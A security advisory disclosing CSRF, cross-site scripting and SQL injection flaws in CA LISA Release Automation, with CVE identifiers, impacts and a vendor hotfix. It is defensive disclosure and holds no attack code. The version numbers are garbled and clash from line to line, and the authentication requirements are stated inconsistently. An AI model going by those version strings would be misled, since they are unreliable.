Vulnerability Note VU#343060
CA LISA Release Automation contains multiple vulnerabilities
Original Release date: 15 Dec 2014 | Last revised: 17 Dec 2014
CA LISA Release Automation 22.214.171.1245 contains multiple vulnerabilities
CWE-352: Cross-Site Request Forgery (CSRF) – CVE-2014-8246
CA LISA Release Automation 126.96.36.1995 contains a global Cross-Site Request Forgery (CSRF) vulnerability. The application allows a malicious user to perform actions on the site with the same permissions as the victim. This vulnerability requires the attacker to be authenticated and have an active session.
CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) – CVE-2014-8247
CA Release Automation 188.8.131.525 contains a global cross-site scripting (XSS) vulnerability in the server exception message.
CWE-89: Improper Neutralization of Special Elements used in a SQL Command (‘SQL Injection’) – CVE-2014-8248
CA Release Automation 184.108.40.2065 contains a SQL injection vulnerability in the filter and parent parameters. This vulnerability may allow an authenticated attacker to elevate privileges by extracting the hash of the administrator user.
Note: the CVSS score reflects CVE-2014-8246
A remote, unauthenticated attacker may be able to execute arbitrary script in the context of the end-user’s browser session, elevate privileges, or perform actions as an authenticated user.
Apply an Update
CA has developed a hotfix which is available on their site. The b448 hotfix includes patches for all of the listed vulnerabilities. Please see CA’s security notice for more details.
Vendor Information (Learn More)
VendorStatusDate NotifiedDate UpdatedCA TechnologiesAffected23 Oct 201417 Dec 2014If you are a vendor and your product is affected, let
CVSS Metrics (Learn More)
Thanks to Julian Horoszkiewicz and Lukasz Plonka for reporting these vulnerabilities.
This document was written by Chris King.
15 Dec 2014
Date First Published:
15 Dec 2014
Date Last Updated:
17 Dec 2014
FeedbackIf you have feedback, comments, or additional information about this vulnerability, please send us email.